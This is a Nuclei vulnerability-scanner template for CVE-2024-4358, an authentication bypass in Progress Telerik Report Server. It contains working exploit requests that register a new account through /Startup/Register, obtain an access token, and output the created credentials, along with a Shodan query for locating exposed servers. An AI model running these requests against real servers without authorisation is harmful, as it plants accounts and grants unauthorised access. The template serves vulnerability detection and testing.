nuclei-templates/http/cves/2024/CVE-2024-4358.yaml

64 lines
2.3 KiB
YAML
Raw Normal View History

2024-06-03 10:40:34 +00:00
id: CVE-2024-4358
info:
2024-06-03 12:21:14 +00:00
name: Progress Telerik Report Server - Authentication Bypass
2024-06-03 10:40:34 +00:00
author: DhiyaneshDK
severity: critical
description: |
In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
2024-06-03 12:21:14 +00:00
impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.
2024-06-03 10:40:34 +00:00
reference:
- https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
- https://github.com/sinsinology/CVE-2024-4358
2024-06-03 12:21:14 +00:00
- https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
2024-06-03 10:40:34 +00:00
metadata:
2024-06-03 12:21:14 +00:00
verified: true
max-request: 2
shodan-query: title:"Log in | Telerik Report Server"
2024-06-04 09:13:34 +00:00
tags: cve,cve2024,telerik,progress,auth-bypass,instrusive
2024-06-03 10:40:34 +00:00
variables:
user: "{{rand_base(6)}}"
pass: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
http:
- raw:
- |
POST /Startup/Register HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}
- |
POST /Token HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
grant_type=password&username={{user}}&password={{pass}}
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "application/json")'
2024-06-03 12:21:14 +00:00
- 'contains_all(body_2, "access_token", "userName", "token_type")'
2024-06-03 10:40:34 +00:00
- 'status_code_2 == 200'
condition: and
extractors:
- type: regex
name: token
part: body_2
group: 1
regex:
- '"access_token":"([A-Z0-9a-z_-]+)"'
internal: true
2024-06-03 12:21:14 +00:00
- type: dsl
dsl:
- '"Username: "+ user'
- '"Password: "+ pass'
# digest: 4b0a00483046022100b40c2678a88f956f4c6349fda05d4d83541374a2907b8731a90941505551b493022100f53a3591f5bd4a3fb03698db001d452302dd2217004277971fc01d9af5e9569f:922c64590222798bb761d5b6d8e72950